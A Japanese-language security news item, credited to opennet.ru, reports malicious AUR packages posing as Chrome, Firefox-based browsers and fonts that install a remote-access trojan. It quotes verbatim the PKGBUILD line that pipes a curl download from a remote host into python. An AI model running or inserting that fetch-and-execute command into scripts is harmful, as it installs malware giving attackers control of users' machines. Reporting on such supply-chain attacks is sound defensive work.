Archが使用するAUR(Arch User Repository)リポジトリ Linux サードパーティ製パッケージを配布するため、非公式のブラウザビルドに悪意のあるコードが埋め込まれたまま公開され続けている。2週間前に発見された悪意のあるパッケージであるfirefox-patch-bin、librewolf-fix-bin、zen-browser-patched-binに加え、google-chrome-stableパッケージがAURに追加され、これもシステムへのリモートアクセスを提供する悪意のあるコンポーネントをインストールする変更が含まれている。
問題のあるパッケージの PKGBUILD ファイルは、google-chrome-stable.sh ブラウザを起動するためのスクリプトのインストールを定義していましたが、その中には、コマンド「python -c "$(curl https://segs.lol/9wUb1Z)"」が含まれていました。このコマンドは、システムのリモート制御、プロセスの開始、ファイルの転送、トラフィックの検査、スクリーンショットの送信を可能にする、VirusTotal サービスによって Spark Trojan として認識されたマルウェアをダウンロードしました。
悪意のあるパッケージ「google-chrome-stable」は一昨日アップロードされ、登場から数時間後にAUR管理者によって削除されました。「google-chrome-stable」の削除直後、ユーザーのシステムにマルウェアをインストールするための類似のスクリプトを含む2つの悪意のあるパッケージ「chrome」と「chrome-bin」がAURにアップロードされました。
さらに、悪意のあるコードを含む 3 つのパッケージ (ttf-mac-fonts-all、ttf-ms-fonts-all、gromit) が検出されました。
出所: オープンネット.ru
